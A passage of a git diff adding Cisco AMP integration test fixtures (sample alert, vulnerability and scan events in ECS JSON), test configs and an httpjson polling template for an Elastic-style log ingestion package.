+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e6:44:a0:56:f3:9a"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.PowershellDownloadedExecutable.ioc",
+                        "description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"
+                }
+            },
+            "@timestamp": "2020-12-25T05:30:41.000Z",
+            "file": {
+                "name": "powershell.exe",
+                "path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe",
+                "hash": {
+                    "sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Intel"
+                ],
+                "hash": [
+                    "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Intel",
+                "hostname": "Demo_AMP_Intel"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701416142Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132474871000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":474861000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}",
+                "kind": "alert",
+                "start": "2020-12-25T05:30:41.000Z",
+                "action": "Cloud IOC",
+                "id": "1519340132474871000",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e6:44:a0:56:f3:9a",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e6:44:a0:56:f3:9a"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.WinWord.Powershell",
+                        "description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"
+                }
+            },
+            "@timestamp": "2020-12-25T05:02:27.000Z",
+            "file": {
+                "name": "mshtml.dll",
+                "hash": {
+                    "sha256": "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Intel"
+                ],
+                "hash": [
+                    "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Intel",
+                "hostname": "Demo_AMP_Intel"
+            },
+            "event": {
+                "severity": 1,
+                "ingested": "2021-09-12T17:32:35.701418Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384389977,\"timestamp\":1608872547,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:27+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872547,\"start_date\":\"2020-12-25T05:02:27+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}",
+                "kind": "alert",
+                "start": "2020-12-25T05:02:27.000Z",
+                "action": "Vulnerable Application Detected",
+                "id": "15193384389977",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e6:44:a0:56:f3:9a",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e6:44:a0:56:f3:9a"
+                        ],
+                        "cve": [
+                            "CVE-2018-0762",
+                            "CVE-2018-0772"
+                        ]
+                    },
+                    "vulnerabilities": [
+                        {
+                            "name": "Microsoft Internet Explorer",
+                            "score": "7.6",
+                            "cve": "CVE-2018-0762",
+                            "version": "11",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"
+                        },
+                        {
+                            "score": "7.6",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772",
+                            "cve": "CVE-2018-0772"
+                        }
+                    ],
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 1107296279
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"
+                }
+            },
+            "@timestamp": "2020-12-25T05:02:26.000Z",
+            "file": {
+                "name": "mshtml.dll",
+                "hash": {
+                    "sha256": "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Intel"
+                ],
+                "hash": [
+                    "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Intel",
+                "hostname": "Demo_AMP_Intel"
+            },
+            "event": {
+                "severity": 1,
+                "ingested": "2021-09-12T17:32:35.701419883Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384371995,\"timestamp\":1608872546,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:26+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872546,\"start_date\":\"2020-12-25T05:02:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}",
+                "kind": "alert",
+                "start": "2020-12-25T05:02:26.000Z",
+                "action": "Vulnerable Application Detected",
+                "id": "15193384371995",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e6:44:a0:56:f3:9a",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e6:44:a0:56:f3:9a"
+                        ],
+                        "cve": [
+                            "CVE-2018-0762",
+                            "CVE-2018-0772"
+                        ]
+                    },
+                    "vulnerabilities": [
+                        {
+                            "name": "Microsoft Internet Explorer",
+                            "score": "7.6",
+                            "cve": "CVE-2018-0762",
+                            "version": "11",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"
+                        },
+                        {
+                            "score": "7.6",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772",
+                            "cve": "CVE-2018-0772"
+                        }
+                    ],
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 1107296279
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"
+                }
+            },
+            "@timestamp": "2020-12-25T04:32:53.000Z",
+            "file": {
+                "name": "OUTLOOK.EXE",
+                "hash": {
+                    "sha256": "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Intel"
+                ],
+                "hash": [
+                    "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Intel",
+                "hostname": "Demo_AMP_Intel"
+            },
+            "event": {
+                "severity": 1,
+                "ingested": "2021-09-12T17:32:35.701421764Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193366641599,\"timestamp\":1608870773,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T04:32:53+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608870773,\"start_date\":\"2020-12-25T04:32:53+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"OUTLOOK.EXE\",\"identity\":{\"sha256\":\"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2016\",\"cve\":\"CVE-2017-0106\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106\"},{\"cve\":\"CVE-2017-11774\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774\"},{\"cve\":\"CVE-2017-8506\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506\"},{\"cve\":\"CVE-2017-8507\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507\"},{\"cve\":\"CVE-2017-8571\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571\"},{\"cve\":\"CVE-2017-8663\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663\"},{\"cve\":\"CVE-2018-0791\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791\"}]}}",
+                "kind": "alert",
+                "start": "2020-12-25T04:32:53.000Z",
+                "action": "Vulnerable Application Detected",
+                "id": "15193366641599",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e6:44:a0:56:f3:9a",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e6:44:a0:56:f3:9a"
+                        ],
+                        "cve": [
+                            "CVE-2017-0106",
+                            "CVE-2017-11774",
+                            "CVE-2017-8506",
+                            "CVE-2017-8507",
+                            "CVE-2017-8571",
+                            "CVE-2017-8663",
+                            "CVE-2018-0791"
+                        ]
+                    },
+                    "vulnerabilities": [
+                        {
+                            "name": "Microsoft Office",
+                            "score": "9.3",
+                            "cve": "CVE-2017-0106",
+                            "version": "2016",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"
+                        },
+                        {
+                            "score": "6.8",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774",
+                            "cve": "CVE-2017-11774"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506",
+                            "cve": "CVE-2017-8506"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507",
+                            "cve": "CVE-2017-8507"
+                        },
+                        {
+                            "score": "6.8",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571",
+                            "cve": "CVE-2017-8571"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663",
+                            "cve": "CVE-2017-8663"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791",
+                            "cve": "CVE-2018-0791"
+                        }
+                    ],
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 1107296279
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2020-12-25T04:22:45.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Intel"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Intel",
+                "hostname": "Demo_AMP_Intel"
+            },
+            "event": {
+                "severity": 0,
+                "action": "Policy Update",
+                "ingested": "2021-09-12T17:32:35.701423630Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525498672153625000,\"timestamp\":1608870165,\"timestamp_nanoseconds\":878000000,\"date\":\"2020-12-25T04:22:45+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
+                "id": "6525498672153625000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e6:44:a0:56:f3:9a",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e6:44:a0:56:f3:9a"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648130
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2020-12-25T04:07:21.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Intel"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Intel",
+                "hostname": "Demo_AMP_Intel"
+            },
+            "event": {
+                "severity": 0,
+                "action": "Scan Completed, No Detections",
+                "ingested": "2021-09-12T17:32:35.701425510Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494703603843000,\"timestamp\":1608869241,\"timestamp_nanoseconds\":928000000,\"date\":\"2020-12-25T04:07:21+00:00\",\"event_type\":\"Scan Completed, No Detections\",\"event_type_id\":554696715,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\",\"clean\":true,\"scanned_files\":2872,\"scanned_processes\":49,\"scanned_paths\":0,\"malicious_detections\":0}}}",
+                "id": "6525494703603843000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "scan": {
+                        "scanned_paths": 0,
+                        "malicious_detections": 0,
+                        "description": "Flash Scan",
+                        "clean": true,
+                        "scanned_files": 2872,
+                        "scanned_processes": 49
+                    },
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e6:44:a0:56:f3:9a",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e6:44:a0:56:f3:9a"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 554696715
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2020-12-25T04:06:40.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Intel"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Intel",
+                "hostname": "Demo_AMP_Intel"
+            },
+            "event": {
+                "severity": 0,
+                "action": "Scan Started",
+                "ingested": "2021-09-12T17:32:35.701427375Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494527510184000,\"timestamp\":1608869200,\"timestamp_nanoseconds\":537000000,\"date\":\"2020-12-25T04:06:40+00:00\",\"event_type\":\"Scan Started\",\"event_type_id\":554696714,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\"}}}",
+                "id": "6525494527510184000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "scan": {
+                        "description": "Flash Scan"
+                    },
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e6:44:a0:56:f3:9a",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e6:44:a0:56:f3:9a"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 554696714
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        }
+    ]
+}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-common-config.yml b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-common-config.yml
new file mode 100644
index 00000000000..5622947e4b8
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-common-config.yml
@@ -0,0 +1,5 @@
+dynamic_fields:
+  event.ingested: ".*"
+fields:
+  tags:
+    - preserve_original_event
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/system/test-default-config.yml b/packages/cisco_amp/data_stream/log/_dev/test/system/test-default-config.yml
new file mode 100644
index 00000000000..1d250dd622a
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/system/test-default-config.yml
@@ -0,0 +1,10 @@
+input: httpjson
+service: amp
+vars: ~
+data_stream:
+  vars:
+    preserve_original_event: true
+    url: http://{{Hostname}}:{{Port}}/v1/events?offset=0&limit=300
+    client_id: abcd-abcd
+    api_key: xxxxxxxxxx
+    ssl.verification_mode: none
diff --git a/packages/cisco_amp/data_stream/log/agent/stream/httpjson.yml.hbs b/packages/cisco_amp/data_stream/log/agent/stream/httpjson.yml.hbs
new file mode 100644
index 00000000000..8f53b5ff95f
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/agent/stream/httpjson.yml.hbs
@@ -0,0 +1,71 @@
+config_version: "2"
+interval: {{interval}}
+request.method: "GET"
+request.url: {{ url }}
+{{#if ssl}}
+request.ssl: {{ssl}}
+{{/if}}
+{{#if http_client_timeout}}
+request.timeout: {{http_client_timeout}}
+{{/if}}
+auth.basic.user: {{ client_id }}
+auth.basic.password: {{ api_key }}
+
+request.transforms:
+- set:
+    target: url.params.start_date
+    value: '[[.cursor.timestamp]]'
+    default: '[[ formatDate (now (parseDuration "-{{ initial_interval }}")) "2006-01-02T15:04:05-07:00" ]]'
+- set:
+    target: url.params.limit
+    value: {{ limit }}
+
+request.rate_limit.limit: '[[ .last_response.header.Get "X-RateLimit-Limit" ]]'
+request.rate_limit.reset: '[[ .last_response.header.Get "X-RateLimit-Reset" ]]'
+request.rate_limit.remaining: '[[ .last_response.header.Get "X-RateLimit-Remaining" ]]'
+
+response.split:
+  target: body.data
+  keep_parent: true
+
+response.pagination:
+- set:
+    target: url.value
+    value: '[[ .last_response.body.metadata.links.next ]]'
+
+cursor:
+  timestamp:
+    value: '[[ .first_event.data.date ]]'
+
+{{#if tags.length}}
+tags:
+{{else if preserve_original_event}}
+tags:
+{{/if}}
+{{#each tags as |tag i|}}
